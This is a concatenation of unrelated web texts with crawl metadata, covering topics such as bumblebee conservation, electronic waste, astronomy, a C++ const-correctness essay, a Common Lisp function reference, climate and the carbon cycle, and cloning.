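# -> roughly 0.5% CO2, 86% HCO3-, 13% CO3-- with these constants
```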
<urn:uuid:83f71493-3e49-4276-a40a-ec809f8c5efc>
3.703125
574
Academic Writing
Science & Tech.
56.875867
The great yellow bumblebee, Bombus distinguendus, is one of our most striking species. It has shown a very dramatic decline in Britain, highlighting the plight of bumblebees and making it a flagship species for bumblebee conservation. Bees are extremely important for pollinating commercial crops and they account for 85% of the value of all insect pollinated crop plants in Europe. The great yellow bumblebee is a large and distinctive looking species. It is declining in geographical range within Britain and is now restricted to just the very northern edge of the country. It is also declining in northern Europe, but is still recorded widely in northern Asia, where it is found as far east as Attu Island in the Pacific. Find out about the taxonomy of the great yellow bumblebee, what makes it stand out from other bee species, and the key features of the males and females. Read about the distribution of the great yellow bumblebee and view distribution maps for the UK and the world. Learn about the biology of the great yellow bumblebee, including lifecycle and life expectancy information. Discover more about this bee's behaviour, including the types of flowers that it likes to collect pollen from. Explore the conservation of the great yellow bumblebee, learn about the threats it faces and view trends in the distribution range within Britain. See a list of reference material. A map showing the global distribution of Bombus distinguendus. Bombus distinguendus, the great yellow bumblebee© D. Goulson A female specimen of Bombus distinguendus© P Williams A male specimen of Bombus distinguendus© P Williams The principal remaining strongholds for Bombus distinguendus are in the Scottish machair grassland© D Goulson Habitat of the great yellow bumblebee, Bombus distinguendus, in the semi-arid areas of Inner Mongolia© P Williams Bombus distinguendus feeding on clover© D Goulson Research entomologist specialising in bees. Encourage bumblebees to nest in your garden by leaving an untidy, undisturbed corner. Bumblebees need a range of different flowers for nectar and pollen, such as native wildflowers like knapweed and clovers, and flowering herbs such as sage and chives. Avoid highly cultivated or double flower varieties as they produce little pollen or nectar.
<urn:uuid:edd189ad-198c-4d90-a4ec-335822b56bef>
3.828125
505
Knowledge Article
Science & Tech.
36.152056
In today's high-paced modern world, technology is moving faster and faster and boosting the speed of our everyday lives. Every eight months there is a new model of some type of technological device reaching the market, and the old is being discarded as it is unable to keep up with our fast-paced society. Where have the millions of old, unwanted computers and other electronics gone? Many have suspected that relatively few old PCs are being recycled and that most are stored in warehouses, basements, and closets or have met their end in municipal landfills or incinerators. In recent years a great deal of attention has been devoted to the environmental impact of computers and other electronic equipment, as these items pose a massive problem for municipal landfills and hazardous effects on human life. Users' manuals can be a pain to read; nevertheless they are pretty handy, covering most of everything we need to know about newly purchased equipment. What is not covered in the users' manual are the toxic chemicals and heavy metals that go into computers and other electronic devices, nor the waste computer manufacturing generates. Of the approximately one thousand different substances included in a typical PC, every computer contains five to eight pounds of lead. Exposure to lead and other toxic ingredients, such as mercury, cadmium, brominated flame retardants, and some plastics, may stunt brain development, disrupt hormone functions, cause cancer, or affect reproduction (Slone, 2000). Manufacturers combine lead, the leading toxic material found in electronic equipment, with tin to form solder, which is used in the production of circuit boards found inside electronic products. Lead is highly toxic and can harm children and developing fetuses, even at low levels of exposure. Brominated flame retardants, used in circuit boards and plastic casing, do not break down easily and build up in the environment. Long term... [continues]
<urn:uuid:b6bc9123-b9dc-434f-b6be-f0f564c40eff>
3.375
536
Truncated
Science & Tech.
42.752244
From our analysis of falling in air, we found that if an object falls long enough through a fluid, it will reach a terminal velocity. Let's look a little closer at this. Terminal velocity occurs when the air resistance (sometimes called "drag") force equals the weight of the falling object. This means that: - the object is falling with a constant velocity - its acceleration is zero - heavy objects will have a higher terminal velocity than light objects. (Why? It takes a larger air resistance force to equal the weight of a heavier object. A larger air resistance force requires more speed.) Therefore, heavy objects will fall faster in air than light objects. (This doesn't happen in free fall, where there is no air resistance.)
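A minimal sketch of this force balance, assuming the common quadratic drag model (drag = ½·ρ·Cd·A·v²) and illustrative numbers:

```python
import math

def terminal_velocity(mass_kg, area_m2, drag_coeff=1.0, air_density=1.2):
    """Speed at which drag (0.5 * rho * Cd * A * v**2) equals weight (m * g),
    so the net force -- and hence the acceleration -- is zero."""
    g = 9.8  # m/s^2
    return math.sqrt(2.0 * mass_kg * g / (air_density * drag_coeff * area_m2))

# Same size and shape, different masses: the heavier object needs a
# larger drag force to balance its weight, which requires more speed.
print(terminal_velocity(0.1, 0.01))   # ~12.8 m/s
print(terminal_velocity(1.0, 0.01))   # ~40.4 m/s
```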
<urn:uuid:259e7a9f-034d-45c0-a801-fafb1e16ca45>
4.21875
162
Knowledge Article
Science & Tech.
55.615625
Introductory Trailer to Chandra In Florence, Italy, in the year 1609, the world changed. Using a small telescope, Galileo proved that the Earth is not distinct from the universe, but part of it. And he showed that there is much more to the universe than we see with the naked eye. In the twentieth century, astronomers made another revolutionary discovery - that optical telescopes reveal only a portion of the universe. Telescopes sensitive to invisible wavelengths of light have detected microwave radiation from the Big Bang, infrared radiation from proto-planetary disks around stars, and X-rays from explosions produced by black holes. Ten years ago this July, the most powerful X-ray telescope ever made began its exploration of the hot Universe. Explore the Universe with Chandra.
<urn:uuid:9e8d4320-ac23-4b83-b463-dbe48d860434>
3.828125
154
Truncated
Science & Tech.
31.210551
In some ways the augmentation of intelligence already has a long history. From the first time we cut notches into sticks or painted on cave walls, we were augmenting our memories by creating a tangible record. The written word developed this concept even further. More recently, the internet and search engines have given us access to a vast subset of human knowledge, effectively extending our memory by many orders of magnitude. Now a number of fields stand at the threshold of augmenting human intelligence directly. Pharmacological methods include drugs called nootropics which enhance learning and attention. Among these are Ampakines which have been tested by DARPA, the research arm of the Defense Department, in an effort to improve attention span and alertness of soldiers in the field, as well as facilitate their learning and memory. Biotechnological and genetic approaches are also being explored in order to identify therapeutic strategies which promote neuroplasticity and improve learning ability. A 2010 European Neuroscience Institute study found memory and learning in elderly mice restored to youthful levels when a cluster of genes was activated using a single enzyme. Several stem cell research studies offer hope not only for degenerative mental pathologies but also for restoring our ability to learn rapidly. In another study, mice exposed to the natural soil bacterium, Mycobacterium vaccae, found their learning rate and retention significantly improved, possibly the result of an autoimmune response. All of these suggest we’ve only begun to scratch the surface when it comes to improving or augmenting intelligence. Brain-computer interfaces, or BCIs, are another avenue currently being explored. A BCI gives a user the ability to control a computer or other device using only their thoughts. BCIs already exist that allow the operation of computer interfaces and wheelchairs, offering hope of a more interactive life to quadriplegics and patients with locked-in syndrome. Systems are even being developed to replace damaged brain function and aid in the control of prosthetic limbs. Cochlear implants are restoring hearing and considerable progress has been made in developing artificial retina implants. Work has also been done on an artificial hippocampus and it is likely there will be a number of other brain prostheses as the brain becomes better understood. All of these point to a day when our ability to tie in to enhanced or external resources could become a reality. Of course, as with many new technologies, there will be those who believe intelligence augmentation should be restricted or banned altogether. But as we’ve seen in the past, this is a response that is doomed to failure. Even if draconian measures managed to prohibit R&D in one country, there will always be others who believe the benefits outweigh the costs. For instance, China is currently sequencing the genomes of 1,000 Chinese adults having an IQ of 145 or higher and comparing these to the genomes of an equal number of randomly picked control subjects. Since a substantial proportion of intelligence is considered to be heritable, the project has interesting potential. But even if this method fails to identify the specific genes that give rise to high intelligence, important information is sure to be garnered. However, regardless of the result, it definitely tells us that China, and probably others, are already committing significant resources to this matter. 
The augmentation of human intelligence is likely to be a mixed blessing, yielding both benefits and abuses. Regardless of our feelings about it, we would be wise to anticipate the kind of future such enhancements could one day bring.
<urn:uuid:9de3e5e1-1e93-4449-93ca-2091a00a18d7>
3.5
698
Personal Blog
Science & Tech.
23.36861
3.4. The size-luminosity distribution function The suggestion that it is smaller galaxies that are driving the increase in star-formation rate to z ~ 1 is more directly illustrated by the bivariate size-luminosity function. Figure 5 (from Paper 2) shows the bivariate size-luminosity function for all galaxies in the CFRS sample that have been observed with HST, computed at 0.2 < z < 0.5 and 0.5 < z < 1. For generality, the size parameter used here is a half-light radius, generated from the 2-dimensional fits. No particular distinction has been made between spheroidal and disk components. Figure 5. The bivariate size-luminosity function for all CFRS galaxies, computed in two redshift intervals and for two cosmologies. The size is a half-light radius. The largest evolutionary changes occur for galaxies with moderate sizes and luminosities. This diagram shows how the largest evolutionary change is the filling in of the central area of the diagram by the appearance of numerous luminous but moderately sized galaxies. These galaxies have M_AB(B) ~ -21.5 and r_0.5 < 5 h_50^-1 kpc. The "ridge-line" at large sizes at the rear of the figure stays more or less unchanged aside from the effects of the modest brightening described above. Again, however, it should be noted that the impression of differential behavior is weakened for low q_0: this is because a given galaxy appears to be larger and more luminous, but rarer, as q_0 is decreased.
<urn:uuid:e3cb3e7a-66ba-4a82-a3a2-9aa6450213fe>
2.90625
335
Academic Writing
Science & Tech.
52.318793
January 12, 2012

The new species Paedophryne amauensis is the world's smallest vertebrate...so far. Photo from: Rittmeyer EN et al. (2012) Ecological Guild Evolution and the Discovery of the World's Smallest Vertebrate. PLoS ONE 7(1): e29797.

The smallest specimen of the new frog, named Paedophryne amauensis, was just 7 millimeters (0.27 inches) long, the largest around 8 millimeters (0.31 inches). The previous record-holder was a fish called Paedocypris progenetica, which ranged from 7.9 to 10.3 millimeters (0.31 to 0.4 inches). According to the paper, the frog genus Paedophryne (meaning 'child frog' in Ancient Greek) includes four of the world's top 10 tiniest frogs. The genus was first described in 2010. On the other end of the spectrum, the blue whale (Balaenoptera musculus) is the world's biggest vertebrate.

"Little is understood about the functional constraints that come with extreme body size, whether large or small," Christopher Austin of Louisiana State University said in a press release, adding, "It was particularly difficult to locate Paedophryne amauensis due to its diminutive size and the males' high-pitched insect-like mating call. But it's a great find. New Guinea is a hotspot of biodiversity, and everything new we discover there adds another layer to our overall understanding of how biodiversity is generated and maintained."

Papua New Guinea's rainforests, some of the least-explored on Earth, are imperiled by logging, monoculture plantations, and mining, worsened by poor governance and widespread corruption. Communities own 90 percent of the land in Papua New Guinea, but have seen their rights radically diminished in recent years as foreign corporations have taken an interest in the mountainous nation. A study in 2008 found that nearly a quarter of the country's forests were degraded or lost between 1972 and 2002, a number far higher than expected. "Papua New Guinea has some of the world's most biologically and culturally rich forests, and they’re vanishing before our eyes," tropical ecologist William Laurance of James Cook University in Cairns, Australia, said in 2010.

Close-up of Paedophryne amauensis. Photo from: Rittmeyer EN et al. (2012) Ecological Guild Evolution and the Discovery of the World's Smallest Vertebrate. PLoS ONE 7(1): e29797.

CITATION: Rittmeyer EN, Allison A, Gründler MC, Thompson DK, Austin CC (2012) Ecological Guild Evolution and the Discovery of the World's Smallest Vertebrate. PLoS ONE 7(1): e29797. doi:10.1371/journal.pone.0029797.

Camera traps snap first ever photo of Myanmar snub-nosed monkey (01/10/2012) In 2010 researchers described a new species of primate that reportedly sneezes when it rains. Unfortunately, the new species was only known from a carcass killed by a local hunter. Now, however, remote camera traps have taken the first ever photo of the elusive, and likely very rare, Myanmar snub-nosed monkey (Rhinopithecus strykeri), known to locals as mey nwoah, or 'monkey with an upturned face'. Locals say the monkeys are easy to locate when it rains, because the rain catches on their upturned noses, causing them to sneeze.

Photos: scientists find new species at world's deepest undersea vent (01/10/2012) It sounds like a medieval vision of hell: in pitch darkness, amid blazing heat, rise spewing volcanic vents. But there are no demons and devils down here; instead the deep sea vent, located in the very non-hellish Caribbean sea, is home to a new species of pale shrimp.
At 3.1 miles (5 kilometers) below the sea's surface, the Beebe Vent Field, south of the Cayman Islands, is the deepest yet discovered.

Photo: Tiny lemur discovered in Madagascar forest (01/08/2012) A new species of mouse lemur has been discovered in eastern Madagascar, report researchers from Germany. The species is described in a recent issue of the journal Primates.
<urn:uuid:2aadd2f6-31fa-4e35-8a22-6b1c67d45bab>
3.484375
924
Content Listing
Science & Tech.
54.527882
The 1860 apparatus catalogue of Edward S. Ritchie of Boston describes the apparatus at the left as "Snell's Improved Powell's Wave Instrument, for showing the Undulations of Light, in Plane, Elliptical and Circular Polarization. The frame is of mahogany, 24 inches long by 30 inches in height; twenty-four white balls are supported upon slender steel rods, to which motion is communicated by an equal number of eccentrics placed upon a shaft within the frame, the balls being arranged to give two entire waves. By raising or depressing the sliding frame, which is sustained by springs, the balls may be made to move either in straight lines, ellipses or circles ... $35.00" This example is on display at the National Museum of American History of the Smithsonian Institution in Washington, D.C.

Ebenezer Strong Snell (1801-1876) was a central figure in science education in New England. He was one of the three graduates of Amherst College in its first class of 1822, having transferred from Williams. After receiving an M.A. from Amherst in 1825, he taught mathematics and physics at Amherst until his death. Snell had a considerable flair for designing and constructing apparatus; the 1852/1870 list of apparatus at Amherst that he drew up contains numerous references to apparatus he built and used. Indeed, his lecture notes are often just lists of apparatus to be used for demonstrations, and the rest of the class followed from the demonstrations of the phenomena.

The ultimate Powell and Snell wave machine is the Universal Wave Motion Apparatus made by the L. E. Knott Apparatus Co. of Boston, priced in the 1916 catalogue at $65.00. The form of the waves that are displayed is a function of the position of the sliding frame. When it is down, as shown in the picture, turning the crank causes the balls on the top to demonstrate transverse waves and the balls on the bottom to show longitudinal waves. Slide the frame up and the upper balls will trace out the circular or elliptical motions characteristic of particles on the surface of a water wave. This apparatus is in regular use at the College of Wooster in Ohio.
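The kinematics behind these machines are easy to model: each eccentric drives its ball with a fixed phase lag relative to its neighbour, and the sliding frame mechanically mixes in a second, quarter-phase component that turns straight-line motion into ellipses or circles. A toy sketch of that geometry (illustrative only, not a description of the actual Ritchie or Knott linkage):

import numpy as np

def ball_displacements(t, n_balls=24, n_waves=2, mix=0.0, amplitude=1.0):
    """Displacement of each ball at time t (in turns of the crank).

    mix = 0.0 -> plane (straight-line, transverse) motion
    mix = 1.0 -> circular motion, as when the sliding frame is raised
    """
    phase = 2 * np.pi * n_waves * np.arange(n_balls) / n_balls
    vertical = amplitude * np.sin(2 * np.pi * t - phase)
    horizontal = mix * amplitude * np.cos(2 * np.pi * t - phase)
    return horizontal, vertical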
<urn:uuid:d2cea97c-6e4f-4689-be34-f5c6eb7830db>
3.5625
472
Knowledge Article
Science & Tech.
54.085209
Thigmotropism is the directional growth of a plant in response to touch, typically growth around a support. A tropism is a phenomenon by which a plant, usually a climber such as money plant or ivy, responds to a stimulus. Stems of the pea plant, for instance, are weak and bear coil-like structures called tendrils. When a tendril touches a support (such as a stick), a phytohormone called auxin accumulates on the side of the tendril away from the support. Auxin, a growth hormone, elongates the cells on that side, so the outer side grows faster than the side touching the support; this difference in growth makes the tendril coil around the support.
<urn:uuid:4462dcf4-3f34-46ff-a13b-199b8d1b66a1>
3.125
130
Knowledge Article
Science & Tech.
54.133333
A Solar System Like Ours, Supersized

The research was published Dec. 8 in the advance online version of the journal Nature. The astronomers say the planetary system resembles a supersized version of our solar system.

"Besides having four giant planets, both systems also contain two 'debris belts' composed of small rocky or icy objects, along with lots of tiny dust particles," said Benjamin Zuckerman, a UCLA professor of physics and astronomy and co-author of the Nature paper. Our giant planets are Jupiter, Saturn, Uranus and Neptune, and our debris belts include the asteroid belt between the orbits of Mars and Jupiter and the Kuiper Belt, beyond Neptune's orbit.

The newly discovered fourth planet (known as HR 8799e) is about 129 light years from Earth. The mass of the HR 8799 planetary system is much greater than our own. Astronomers estimate that the combined mass of the four giant planets may be 20 times greater than the mass of all the planets in our solar system, and the debris belt counterparts also contain much more mass than our own.

"This is the fourth imaged planet in this planetary system, and only a tiny percentage of known exoplanets (planets outside our solar system) have been imaged; none has been imaged in multiple-planet systems other than those of HR 8799," Zuckerman said.

All four planets orbiting HR 8799 are similar in size, likely between five and seven times the mass of Jupiter. The newly discovered planet orbits HR 8799 more closely than the other three. If it were in orbit around our sun, astronomers say, it would lie between the orbits of Saturn and Uranus. The astronomers used the Keck II telescope at Hawaii's W.M. Keck Observatory to obtain images of the fourth planet. Zuckerman's colleagues are from Canada's National Research Council (NRC), Lawrence Livermore National Laboratory (LLNL) in California, and Lowell Observatory in Arizona.

"We reached a milestone in the search for other worlds in 2008 with the discovery of the HR 8799 planetary system," said Christian Marois, an NRC astronomer and lead author of the Nature paper. "The images of this new inner planet are the culmination of 10 years' worth of innovation, making steady progress to optimize every aspect of observation and analysis. This allows us to detect planets located ever closer to their stars and ever further from our own solar system."

"The four massive planets pull on each other gravitationally," said co-author Quinn Konopacky, a postdoctoral researcher at LLNL. "We don't yet know if the system will last for billions of years or fall apart in a few million more. As astronomers carefully follow the HR 8799 planets during the coming decades, the question of the stability of their orbits could become much clearer."

"There's no simple model that can form all four planets at their current location," said co-author Bruce Macintosh of LLNL. "It's going to be a challenge for our theoretical colleagues."

It is entirely plausible that this planetary system contains additional planets closer to the star than these four planets, quite possibly rocky, Earth-like planets, Zuckerman said. But such interior planets are far more difficult to detect, he added.

"Images like these bring the exoplanet field, which studies planets outside our solar system, into an era of exoplanet characterization," said co-author Travis Barman, a Lowell Observatory exoplanet theorist.
"Astronomers can now directly examine the atmospheric properties of four giant exoplanets that are all the same young age and that formed from the same building materials." Detailed study of the properties of HR 8799e will be challenging due to the planet's relative faintness and its proximity to its star. To overcome those limitations, Macintosh is leading an effort to build an advanced exoplanet imager, called the Gemini Planet Imager, for the Gemini Observatory. This new instrument will physically block the starlight and allow quick detection and detailed characterization of planets similar to HR 8799e. UCLA and the NRC are also contributing to Gemini Planet Imager. James Larkin, a UCLA professor of physics and astronomy, is building a major component of the imager, which is scheduled to arrive at the Gemini South Telescope in Chile late next year. The research reported in Nature was funded by NASA, the U.S. Department of Energy and the National Science Foundation Center for Adaptive Optics. For more information, visit the NRC's website at www.nrc-cnrc.gc.ca.
<urn:uuid:6529d406-46eb-4a39-894f-dbf2e99a9d3c>
3.296875
944
Knowledge Article
Science & Tech.
42.635032
...a nondestructive phenomenon if the resulting power dissipation is limited to a safe value. The applied forward voltage is usually less than one volt, but the reverse critical voltage, called the breakdown voltage, can vary from less than one volt to many thousands of volts, depending on the impurity concentration of the junction and other device parameters.
<urn:uuid:10639d36-0b5b-4bbe-bc53-767dac95b7d3>
2.921875
125
Knowledge Article
Science & Tech.
44.558094
The Mutable Comprehension of const

I don't know about you, but I get all future-shocked when trying to express or understand concepts where language is used ambiguously. Unfortunately, even after all these years, it seems that the use of const as a modifier of pointer/reference types in C and C++ can cause confusion. I've been working with some talented C++ developers recently, and have been surprised to learn that confusion over the use of the const modifier, when applied to pointers and references, still persists even among programmers of considerable experience. I think there are three reasons why this is so: language, syntax, and the C++ Standard.

In my opinion, the key to surviving the ambiguity of const pointers and references is to not use the word "const" at all, and instead rely on the use of precise nomenclature about what is actually implied by its use: mutability.

Language

The problem with "const" is that it's just not specific enough. When someone says "const pointer" it's not clear whether the pointer is const (i.e. it must always point to the same location) or the thing it points to is const(ant) (i.e. the variable to which it points cannot be changed). This is further complicated by the fact that a variable referred to by a "const" pointer may be changed by another (non-const) alias to it elsewhere in the program. It's actually impossible, and inappropriate, to infer that a variable is const from a pointer to it.

Rather than this imprecision and ambiguity, I suggest programmers should eschew phrases such as "const pointer", "non-const pointer", "pointer to const int", "pointer to non-const int", and "const pointer to const int". Prefer instead the unambiguous phrases "immutable pointer", "mutable pointer", "non-mutating pointer to int", "mutating pointer to int", and "immutable non-mutating pointer to int". A pointer may or may not be mutable (whether the pointer may be changed to point to a different location) and may or may not be mutating (whether it may be used to change the variable to which it refers).

(Note: in this way, the always-confusing terminology of the "const reference" goes away. Strictly speaking, a reference is always const, because references cannot be reassigned. In the new terminology, references are immutable. Which we knew. Now we need only concern ourselves with whether a reference is mutating or non-mutating.)

Syntax

C and C++ are agnostic about where the const modifier can be placed in a majority of contexts. The following pairs of constructs are identical:

// 1. int const
const int i = 10;
int const j = 20;

// 2. pointer-to-int const
const int* p = &i;
int const* q = &j;

// 3. reference-to-int const
const int& p = i;
int const& q = j;

I prefer the second form of each, and I strongly recommend it to C/C++ programmers, because (I believe that) it's the only way in which one can sensibly read composite types: from right to left. Consider the following two equivalent ways of specifying a pointer:

const int* const p = &i;
int const* const q = &j;

Both p and q are immutable non-mutating pointers to int. If we read from right to left, the presence/absence of const to the right of the * determines whether the pointer is mutable/immutable, and the presence/absence of const to the left of the * determines whether the pointer is mutating/non-mutating. By always preferring the X const form over the const X form, the const, if present, will be immediately adjacent to the *.

Doing the same for non-pointer/non-reference variable declarations follows for reasons of consistency. Let's do a few more to practise:

// A mutable mutating pointer to int
int* p = &i;
// A mutable non-mutating pointer to int
int const* p = &i;
// An immutable mutating pointer to int
int* const p = &i;
// An immutable non-mutating pointer to int
int const* const p = &i;
// An (immutable) mutating reference to int
int& r = i;
// An (immutable) non-mutating reference to int
int const& r = i;

The C++ Standard

Historically, the C++ Standard is not much of a friend to us in so far as precise names go, and that is also the case in this regard. There are the well-known obvious ambiguities, such as the inconsistency between empty() (an interrogative: is the instance empty?) and erase() (an imperative: clear the instance contents). With member types of pointers, references, and iterators, the use of the word const as part of essential member types const_pointer and, particularly, const_iterator gets more confusing. It's not only possible to change a const_iterator, it's actually essential to traversing ranges. Furthermore, with some containers (such as C++0x sets), erasing elements is done via a const_iterator. A const_iterator is not an immutable iterator; it's a non-mutating iterator: an iterator through which one may access an element in a non-mutating manner, and with which one may traverse the sequence to access, in a non-mutating manner, other elements in the container/collection.

Language, Syntax, The C++ Standard: How to Survive

My ways to survive these issues are:

- Syntax: always apply the const modifier after the type being modified. I've been an adherent to this for pointers and references for many years, but have only recently gone the whole hog in applying it to all types of variables consistently. I'm finding it beneficial.
- Language: when writing documentation or articles (or blogs, or books), I always refer to pointers/references/iterators in terms of their being mutable/immutable and mutating/non-mutating.
- The C++ Standard: the fat lady has sung on this one. Don't bother trying to create container types with a mutating operation called empty(), or with mutating_iterator member types. There's just too much mindshare and technical momentum to buck it.
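To close, here is a small compilable recap of the pointer taxonomy above (the variable names are mine, not the article's); uncommenting any marked line produces a compile error:

#include <iostream>

int main() {
    int i = 10;
    int j = 20;

    int* p1 = &i;               // mutable mutating pointer to int
    *p1 = 11;                   // ok: may change its pointee
    p1 = &j;                    // ok: may be repointed

    int const* p2 = &i;         // mutable non-mutating pointer to int
    // *p2 = 12;                // error: pointee may not be changed through p2
    p2 = &j;                    // ok: may be repointed

    int* const p3 = &i;         // immutable mutating pointer to int
    *p3 = 12;                   // ok: may change its pointee
    // p3 = &j;                 // error: may not be repointed

    int const* const p4 = &i;   // immutable non-mutating pointer to int
    // *p4 = 13;                // error
    // p4 = &j;                 // error

    // A non-mutating pointer does not make the variable itself immutable:
    i = 99;                     // legal, even though p4 still points at i
    std::cout << *p4 << '\n';   // prints 99
    return 0;
}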
<urn:uuid:c6cbb55c-7276-4558-af63-0dcf82e78064>
2.71875
1,419
Personal Blog
Software Dev.
48.031656
ANSI Common Lisp
21 Streams
21.2 Dictionary of Streams

read-char-no-hang &optional input-stream eof-error-p eof-value recursive-p => char

- Arguments and Values:
input-stream -- an input stream designator. The default is standard input.
eof-error-p -- a generalized boolean. The default is true.
eof-value -- an object. The default is nil.
recursive-p -- a generalized boolean. The default is false.
char -- a character or nil or the eof-value.

- Description:
read-char-no-hang returns a character from input-stream if such a character is available. If no character is available, read-char-no-hang returns nil.
If recursive-p is true, this call is expected to be embedded in a higher-level call to read or a similar function used by the Lisp reader.
If an end of file occurs and eof-error-p is false, eof-value is returned.

- Examples:
;; This code assumes an implementation in which a newline is not
;; required to terminate input from the console.
(defun test-it ()
  (unread-char (read-char))
  (list (read-char-no-hang)
        (read-char-no-hang)
        (read-char-no-hang)))

;; Implementation A, where a Newline is not required to terminate
;; interactive input on the console.
(test-it) => (#\a NIL NIL)

;; Implementation B, where a Newline is required to terminate
;; interactive input on the console, and where that Newline remains
;; on the input stream.
(test-it) => (#\a #\Newline NIL)

- Affected By:
- Exceptional Situations:
If an end of file occurs when eof-error-p is true, an error of type end-of-file is signaled.
- See Also:
- Notes:
read-char-no-hang is exactly like read-char, except that if it would be necessary to wait in order to get a character (as from a keyboard), nil is immediately returned without waiting.
- Allegro CL Implementation Details:
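As a general usage illustration (not Allegro-specific and not part of the ANSI text), read-char-no-hang is the natural building block for a non-blocking polling loop:

;; Collect every character that is already available on STREAM, returning
;; immediately rather than waiting for further input. (Illustrative only.)
(defun drain-available-input (&optional (stream *standard-input*))
  (loop for ch = (read-char-no-hang stream nil :eof)
        until (or (null ch)        ; nothing more available right now
                  (eq ch :eof))    ; end of file reached
        collect ch))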
<urn:uuid:caaa3ae9-03f2-46f5-996d-6a611c62359c>
3.25
428
Documentation
Software Dev.
53.155849
Solar radiation, temperature and available water affect photosynthesis, plant respiration and decomposition; thus climate change can lead to changes in NEP. A substantial part of the interannual variability in the rate of increase of CO2 is likely to reflect terrestrial biosphere responses to climate variability (Section 3.5.3). Warming may increase NPP in temperate and arctic ecosystems where it can increase the length of the seasonal and daily growing cycles, but it may decrease NPP in water-stressed ecosystems as it increases water loss. Respiratory processes are sensitive to temperature; soil and root respiration have generally been shown to increase with warming in the short term (Lloyd and Taylor, 1994; Boone et al., 1998) although evidence on longer-term impacts is conflicting (Trumbore, 2000; Giardina and Ryan, 2000; Jarvis and Linder, 2000). Changes in rainfall pattern affect plant water availability and the length of the growing season, particularly in arid and semi-arid regions. Cloud cover can be beneficial to NPP in dry areas with high solar radiation, but detrimental in areas with low solar radiation. Changing climate can also affect the distribution of plants and the incidence of disturbances such as fire (which could increase or decrease depending on warming and precipitation patterns, possibly resulting under some circumstances in rapid losses of carbon), wind, and insect and pathogen attacks, leading to changes in NBP. The global balance of these positive and negative effects of climate on NBP depends strongly on regional aspects of climate change.

The climatic sensitivity of high northern latitude ecosystems (tundra and taiga) has received particular attention as a consequence of their expanse, high carbon density, and observations of disproportionate warming in these regions (Chapman and Walsh, 1993; Overpeck et al., 1997). High-latitude ecosystems contain about 25% of the total world soil carbon pool in the permafrost and the seasonally-thawed soil layer. This carbon storage may be affected by changes in temperature and water table depth. High-latitude ecosystems have low NPP, in part due to short growing seasons, and slow nutrient cycling because of low rates of decomposition in waterlogged and cold soils. Remotely sensed data (Myneni et al., 1997) and phenological observations (Menzel and Fabian, 1999) independently indicate a recent trend to longer growing seasons in the boreal zone and temperate Europe. Such a trend might be expected to have increased annual NPP. A shift towards earlier and stronger spring depletion of atmospheric CO2 has also been observed at northern stations, consistent with earlier onset of growth at mid- to high northern latitudes (Manning, 1992; Keeling et al., 1996a; Randerson, 1999). However, recent flux measurements at individual high-latitude sites have generally failed to find appreciable NEP (Oechel et al., 1993; Goulden et al., 1998; Schulze et al., 1999; Oechel et al., 2000). These studies suggest that, at least in the short term, any direct effect of warming on NPP may be more than offset by an increased respiration of soil carbon caused by the effects of increased depth of soil thaw. Increased decomposition may, however, also increase nutrient mineralisation and thereby indirectly stimulate NPP (Melillo et al., 1993; Jarvis and Linder, 2000; Oechel et al., 2000).

Large areas of the tropics are arid and semi-arid, and plant production is limited by water availability.
There is evidence that even evergreen tropical moist forests show reduced GPP during the dry season (Malhi et al., 1998) and may become a carbon source under the hot, dry conditions of typical El Niño years. With a warmer ocean surface, and consequently generally increased precipitation, the global trend in the tropics might be expected to be towards increased NPP, but changing precipitation patterns could lead to drought, reducing NPP and increasing fire frequency in the affected regions. Other reports in this collection
<urn:uuid:5ea7bd5e-8390-4613-9355-14073c3a7f5b>
3.453125
832
Academic Writing
Science & Tech.
35.457098
Cloning is the process of producing populations of genetically-identical individuals that occurs in nature when organisms such as bacteria, insects or plants reproduce asexually. Cloning in biotechnology refers to processes used to create copies of DNA fragments (molecular cloning), cells (cell cloning), or organisms.

Topics of Interest

The term clone is derived from the Greek word for "trunk, branch", referring to the process whereby a new plant can be created from a twig.

Molecular cloning refers to the procedure of isolating a defined DNA sequence and obtaining multiple copies of it in vivo. Cloning is frequently employed to amplify DNA fragments containing genes, but it can be used to amplify any DNA sequence, such as promoters, non-coding sequences, chemically synthesised oligonucleotides and randomly fragmented DNA. Cloning is used in a wide array of biological experiments and technological applications such as large-scale protein production.

Somatic cell nuclear transfer (SCNT) is a laboratory technique for creating a cloned embryo, using an ovum with a donor nucleus. It can be used in embryonic stem cell research, or, potentially, in regenerative medicine, where it is sometimes referred to as "therapeutic cloning." It can also be used as the first step in the process of reproductive cloning.

Asexual reproduction is reproduction which does not involve meiosis, ploidy reduction, or fertilization. Only one parent is involved in asexual reproduction. A more stringent definition is agamogenesis, which refers to reproduction without the fusion of gametes. Asexual reproduction is the primary form of reproduction for single-celled organisms such as the archaea, bacteria, and protists. Many plants and fungi reproduce asexually as well. While all prokaryotes reproduce asexually (without the formation and fusion of gametes), mechanisms for lateral gene transfer such as conjugation, transformation and transduction are sometimes likened to sexual reproduction. A lack of sexual reproduction is relatively rare among multicellular organisms, for reasons that are not completely understood. Current hypotheses suggest that, while asexual reproduction may have short-term benefits when rapid population growth is important or in stable environments, sexual reproduction offers a net advantage by allowing more rapid generation of genetic diversity, allowing adaptation to changing environments.

Dolly (5 July 1996 – 14 February 2003) was a female domestic sheep, remarkable in being the first mammal to be cloned from an adult somatic cell, using the process of nuclear transfer. She was cloned by Ian Wilmut, Keith Campbell and colleagues at the Roslin Institute near Edinburgh in Scotland. She was born on 5 July 1996 and she lived until the age of six. She has been called "the world's most famous sheep" by sources including BBC News and Scientific American.

Human cloning is the creation of a genetically identical copy of a human (not usually referring to monozygotic multiple births), human cell, or human tissue. The ethics of cloning is an extremely controversial issue. The term is generally used to refer to artificial human cloning; human clones in the form of identical twins are commonplace, with their cloning occurring during the natural process of reproduction. There are two commonly discussed types of human cloning: therapeutic cloning and reproductive cloning.
Therapeutic cloning involves cloning cells from an adult for use in medicine and is an active area of research, while reproductive cloning would involve making cloned humans. Such reproductive cloning has not been performed and is illegal in many countries. A third type of cloning, called replacement cloning, is a theoretical possibility and would be a combination of therapeutic and reproductive cloning. Replacement cloning would entail the replacement of an extensively damaged, failed, or failing body through cloning, followed by a whole or partial brain transplant.

Ethics of cloning refers to a variety of ethical positions regarding the practice and possibilities of cloning, especially human cloning. While many of these views are religious in origin, the questions raised by cloning are faced by secular perspectives as well. As the science of cloning continues to advance, governments have dealt with ethical questions through legislation.

